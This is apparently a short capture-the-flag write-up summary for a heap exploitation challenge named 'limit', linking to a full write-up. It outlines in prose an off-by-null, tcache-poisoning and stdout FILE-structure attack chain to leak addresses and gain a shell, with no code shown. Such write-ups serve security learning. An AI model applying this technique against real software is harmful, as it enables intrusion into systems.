Tags: pwn heap
Rating:
### Exploit summary
Exploit the off-by-null bug to create overlapping chunks, then leverage tcache poisoning in an interesting way to bypass the heap limit restriction. Instead of allocating chunks beyond the boundary, allocate a chunk inside the tcache entries array itself. Abuse this primitive to leak stack and binary addresses by redirecting allocations to arbitrary memory locations and reading the next chunk pointer, then finally overwrite a chunk pointer in the global chunks array to point to stdout and perform a file struct exploit to gain shell access.
Full writeup link:
[https://razvan.sh/writeups/limit-smileyctf/](https://razvan.sh/writeups/limit-smileyctf/)